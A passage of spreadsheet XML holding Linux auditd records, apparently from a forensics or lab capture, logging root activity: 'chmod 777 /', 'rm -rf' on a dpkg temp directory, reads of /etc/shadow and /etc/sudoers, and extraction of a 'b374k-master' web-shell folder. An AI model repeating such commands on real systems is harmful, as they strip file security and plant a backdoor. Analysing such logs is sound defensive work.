    <t>msg=audit(1584778240.099:1363):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1364):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.099:1365):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.103:1366):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.103:1367):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.103:1368):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.103:1369):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.103:1370):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1371):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1372):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1373):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1374):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1375):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1376):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1377):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1378):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1379):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1380):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1381):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1382):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1383):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1384):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1385):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.107:1386):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.111:1387):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.111:1388):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1389):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1390):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1391):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1392):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1393):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1394):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1395):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1396):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1397):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1398):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1399):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.127:1400):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.131:1401):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.131:1402):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.131:1403):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.131:1404):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.135:1405):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.135:1406):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.135:1407):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.135:1408):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1409):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1410):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1411):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1412):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1413):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.139:1414):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.187:1415):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.187:1416):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.191:1417):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=94 success=yes exit=0 a0=5642e4b4c0b0 a1=0 a2=0 a3=0 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778240.191:1418):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=94 success=yes exit=0 a0=5642e4b4c000 a1=0 a2=0 a3=5642e46b0010 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778240.191:1419):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.195:1420):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=94 success=yes exit=0 a0=5642e4b4c000 a1=0 a2=0 a3=100 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778240.199:1421):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=b a1=1a4 a2=241 a3=1b6 items=1 ppid=2175 pid=4154 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1422):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7fff9894d4d0 a1=7fff9894d5d0 a2=5642e46b1c70 a3=1 items=1 ppid=4154 pid=4170 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="dpkg" exe="/usr/bin/dpkg" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1423):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1424):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1425):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1426):</t>
  </si>
  <si>
    <t>msg=audit(1584778240.223:1427):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7fff9894d4d0 a1=7fff9894d5d0 a2=5642e46b1c70 a3=1 items=2 ppid=4154 pid=4170 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="rm" exe="/bin/rm" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="rm" a1="-rf" a2="--" a3="/var/lib/dpkg/tmp.ci"</t>
  </si>
  <si>
    <t>msg=audit(1584778244.171:1482):</t>
  </si>
  <si>
    <t>msg=audit(1584778318.144:1483):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55955843c920 a1=55955846fe10 a2=55955846de60 a3=8 items=2 ppid=3730 pid=4913 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="chmod" exe="/bin/chmod" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="chmod" a1="777" a2="/"</t>
  </si>
  <si>
    <t>proctitle=63686D6F6400373430002F</t>
  </si>
  <si>
    <t>msg=audit(1584778318.176:1484):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=268 success=yes exit=0 a0=ffffff9c a1=55730afa64c0 a2=1e0 a3=0 items=1 ppid=3730 pid=4913 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="chmod" exe="/bin/chmod" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584778331.428:1485):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53d1c50 a1=5591c53d1d60 a2=5591c53a9220 a3=0 items=2 ppid=2175 pid=8935 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="systemctl" exe="/bin/systemctl" key="systemd"</t>
  </si>
  <si>
    <t>argc=3 a0="systemctl" a1="restart" a2="network-managers"</t>
  </si>
  <si>
    <t>proctitle=73797374656D63746C0072657374617274006E6574776F726B2D6D616E6167657273</t>
  </si>
  <si>
    <t>msg=audit(1584778334.060:1486):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53d2120 a1=5591c53d21c0 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=8937 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="ls" exe="/bin/ls" key="rootcmd"</t>
  </si>
  <si>
    <t>type=ANOM_ABEND</t>
  </si>
  <si>
    <t>msg=audit(1584778336.692:1487):</t>
  </si>
  <si>
    <t>auid=1000 uid=1000 gid=1000 ses=4 pid=1947 comm="gnome-terminal-" exe="/usr/lib/gnome-terminal/gnome-terminal-server" sig=6 res=1</t>
  </si>
  <si>
    <t>msg=audit(1584778336.952:1488):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5591c53d1ff0 a1=0 a2=0 a3=0 items=1 ppid=2174 pid=2175 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>item=0 name="/sbin/ifconfig" inode=917525 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/lib64/ld-linux-x86-64.so.2" inode=267405 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/sshd" inode=1457590 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/shadow" inode=2371212 dev=08:01 mode=0100640 ouid=0 ogid=42 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/var/log/btmp" inode=2101630 dev=08:01 mode=0100660 ouid=0 ogid=43 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/sh" inode=2228258 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/env" inode=1442056 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/run-parts" inode=2228367 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/00-header" inode=2361837 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/bin/sh" inode=2228258 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=2 name="/lib64/ld-linux-x86-64.so.2" inode=267405 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/uname" inode=2228402 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/10-help-text" inode=2361838 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/50-motd-news" inode=2361839 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/cut" inode=1441984 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/tr" inode=1443121 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/head" inode=1442284 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/cat" inode=2228249 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/80-esm" inode=2361840 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/lsb_release" inode=1442439 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/usr/bin/python3" inode=1442919 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/80-livepatch" inode=2361841 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/grep" inode=2228283 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/sed" inode=2228369 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/90-updates-available" inode=2361842 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/91-release-upgrade" inode=2361843 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/ubuntu-release-upgrader/release-upgrade-motd" inode=1450998 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/date" inode=2228259 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/stat" inode=1443058 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/expr" inode=1442069 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/95-hwe-eol" inode=2361844 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/update-notifier/update-motd-hwe-eol" inode=1451016 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/apt-config" inode=1441849 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dpkg" inode=1442032 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/find" inode=1442087 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/dirname" inode=1442026 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/mktemp" inode=2228314 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/rm" inode=2228364 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/98-fsck-at-reboot" inode=2361845 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/update-notifier/update-motd-fsck-at-reboot" inode=1451015 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/awk" inode=1442479 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/mount" inode=2228316 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/sbin/dumpe2fs" inode=917540 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/update-motd.d/98-reboot-required" inode=2361846 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/lib/update-notifier/update-motd-reboot-required" inode=1451017 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/dev/pts/3" inode=6 dev=00:16 mode=020620 ouid=0 ogid=5 rdev=88:03 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/var/run/utmp" inode=594 dev=00:17 mode=0100664 ouid=0 ogid=43 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/var/log/wtmp" inode=2101636 dev=08:01 mode=0100664 ouid=0 ogid=43 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/var/log/lastlog" inode=2101634 dev=08:01 mode=0100664 ouid=0 ogid=43 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/home/zapdos/.bash_history" inode=2631322 dev=08:01 mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/whoami" inode=1443209 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/wget" inode=1443204 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/crontab" inode=1441978 dev=08:01 mode=0102755 ouid=0 ogid=105 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/sensible-editor" inode=1442988 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/which" inode=2228409 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/select-editor" inode=1442986 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/touch" inode=2228397 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/wc" inode=1443203 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/update-alternatives" inode=1443170 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/gettext" inode=1442154 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/sort" inode=1443035 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/true" inode=2228398 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/nano" inode=2228321 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2631596 dev=08:01 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/base64" inode=1441886 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/sudo" inode=1443067 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/etc/sudoers" inode=2359503 dev=08:01 mode=0100440 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/anacron" inode=1452402 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/unzip" inode=1443168 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="b374k-master/" inode=2101648 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101649 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101650 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="b374k-master/base/" inode=2101651 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101652 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101653 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101654 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101655 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101656 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101657 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101658 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101659 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101660 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101661 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="b374k-master/module/" inode=2101662 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101663 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101664 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101665 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2101666 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
